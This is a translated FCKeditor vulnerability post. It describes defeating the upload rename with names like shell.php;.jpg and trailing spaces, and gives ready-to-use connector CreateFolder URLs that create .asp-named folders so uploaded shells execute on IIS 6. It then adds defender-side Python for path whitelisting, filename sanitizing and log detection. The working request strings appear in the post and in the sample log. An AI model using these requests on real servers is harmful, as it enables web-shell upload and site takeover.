FCKeditor 0day: creating a folder, and bypassing the "." to "_" rename on upload - vulnerability warning - 黑吧安全网 (MyHack58)

ID MYHACK58:62201236412
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-12-27T00:00:00


Much of the time an uploaded file such as shell.php.rar or shell.php;.jpg ends up stored as shell_php;.jpg. This is the change in the new version of FCKeditor; try uploading 1.asp;jpg.

Submitting shell.php followed by a space gets around it, but the trailing-space trick only works on Windows; on *nix it is not supported, because shell.php and "shell.php " (with the space) are two different files. Untested.

Uploading the same file again produces the variant shell.php;(1).jpg. You can also create a new folder: only the first-level directory is checked, so moving to a second-level directory is not restricted.

Breaking out via folder creation:

editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp


Current directory name: CurrentFolder=/qing.asp

New directory name: NewFolderName=x.asp

It is actually very simple: in the directory field type x.asp, then click "New Folder", and in the pop-up dialog box just type ......

Then x.asp has been created. This approach works every time!

Passing x.asp as the new folder name basically gets you there.

The following request creates 2.asp under 1.asp. When 1.asp does not yet exist it is created first: the filter only checks the directory being created, and does not check a non-existent parent directory that gets created along the way.

aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp

Get the file list: aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
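The two weaknesses the page describes are a folder-name check that looks only at the new leaf name (so CurrentFolder=/qing.asp or a non-existent parent like /1.asp slips through) and an upload sanitizer that rewrites "." in the base name but is defeated by ";", a trailing space, or the duplicate-name rename. Both matter on IIS 6, which executes files inside a folder named *.asp, and files named *.asp;*.jpg, as ASP. The following Python is an added defender-side example, not code from the page or from FCKeditor: a hardened CreateFolder check that validates every component of the whole path, an upload-name sanitizer that keeps exactly one allow-listed extension, and a small detector run over constructed IIS W3C-style log lines that reproduces the page's connector URLs. The log format, field order, and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Extensions IIS 6 treats as script; a folder or file component ending in one of
# these (optionally followed by ';', '.' or whitespace) is what the page abuses.
EXEC_EXT_RE = re.compile(r"\.(asp|aspx|asa|cer|cdx|php|jsp)(?:[;.\s]|$)", re.IGNORECASE)
# Whitelist for folder-name components: no dots at all, so "x.asp" can never pass.
SAFE_COMPONENT_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
ALLOWED_UPLOAD_EXT = {"jpg", "jpeg", "png", "gif"}


def split_components(path):
    """Split a CurrentFolder/NewFolderName value into its non-empty path components."""
    return [c for c in unquote(path).replace("\\", "/").split("/") if c not in ("", ".")]


def folder_request_is_safe(current_folder, new_folder_name):
    """Hardened check (assumed, not FCKeditor's own): the new name must be exactly one
    component and every component of the *whole* resulting path must match the whitelist."""
    new = split_components(new_folder_name)
    if len(new) != 1:
        return False
    return all(SAFE_COMPONENT_RE.match(c) for c in split_components(current_folder) + new)


def sanitize_upload_name(filename):
    """Return a safe stored name, or None to reject. Unlike a '.'-to-'_' rewrite of the
    base name alone, this keeps exactly one extension, requires it to be allow-listed, and
    maps every other non-alphanumeric character (';', ' ', '.', '(') in the base to '_'."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path part
    base, sep, ext = name.rpartition(".")
    if not sep or not base:
        return None
    ext = ext.lower()
    if ext not in ALLOWED_UPLOAD_EXT:  # "php ", "asp;jpg" and "rar" all fail here
        return None
    base = re.sub(r"[^A-Za-z0-9_-]", "_", base)
    return f"{base}.{ext}"


def flag_connector_request(log_line):
    """Inspect one constructed W3C-style line (date time method uri-stem uri-query status)
    and return a reason string for a suspicious FCKeditor connector request, else None."""
    parts = log_line.split()
    if len(parts) < 6:
        return None
    _date, _time, _method, stem, query, _status = parts[:6]
    if "/filemanager/connectors/" not in stem.lower():
        return None
    params = {} if query == "-" else {
        k.lower(): v[0] for k, v in parse_qs(query, keep_blank_values=True).items()
    }
    current = params.get("currentfolder", "/")
    new_name = params.get("newfoldername", "")
    for comp in split_components(current) + split_components(new_name):
        if EXEC_EXT_RE.search(comp):
            return "executable extension in folder path"
    if params.get("command", "").lower() == "createfolder":
        if not folder_request_is_safe(current, new_name):
            return "CreateFolder with non-whitelisted folder name"
    return None


def scan_log(lines):
    """Return [(line_index, reason)] for every flagged line."""
    hits = []
    for i, line in enumerate(lines):
        reason = flag_connector_request(line)
        if reason:
            hits.append((i, reason))
    return hits


# Constructed sample log: the first two lines are the page's own connector requests.
SAMPLE_LOG = [
    "2012-12-27 10:00:01 GET /editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp "
    "Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp 200",
    "2012-12-27 10:00:02 GET /editor/filemanager/connectors/aspx/connector.aspx "
    "Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp 200",
    "2012-12-27 10:00:03 GET /editor/filemanager/connectors/aspx/connector.aspx "
    "Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F 200",
    "2012-12-27 10:00:04 GET /editor/filemanager/connectors/aspx/connector.aspx "
    "Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=holiday_photos 200",
    "2012-12-27 10:00:05 GET /index.html - 200",
]

if __name__ == "__main__":
    for idx, why in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {why}")
    for n in ["shell.php;.jpg", "shell.php.rar", "shell.php ", "1.asp;jpg", "shell.php;(1).jpg"]:
        print(repr(n), "->", sanitize_upload_name(n))
```

The folder check deliberately refuses any dot in any component rather than trying to enumerate bad extensions, which is what the page's filter gets wrong twice: it inspects only the leaf name, and it never looks at parents that the connector creates implicitly. The detector keys on the connector path and the CurrentFolder/NewFolderName components, so the page's GetFoldersAndFiles listing request with CurrentFolder=%2F is left alone while both CreateFolder requests are reported.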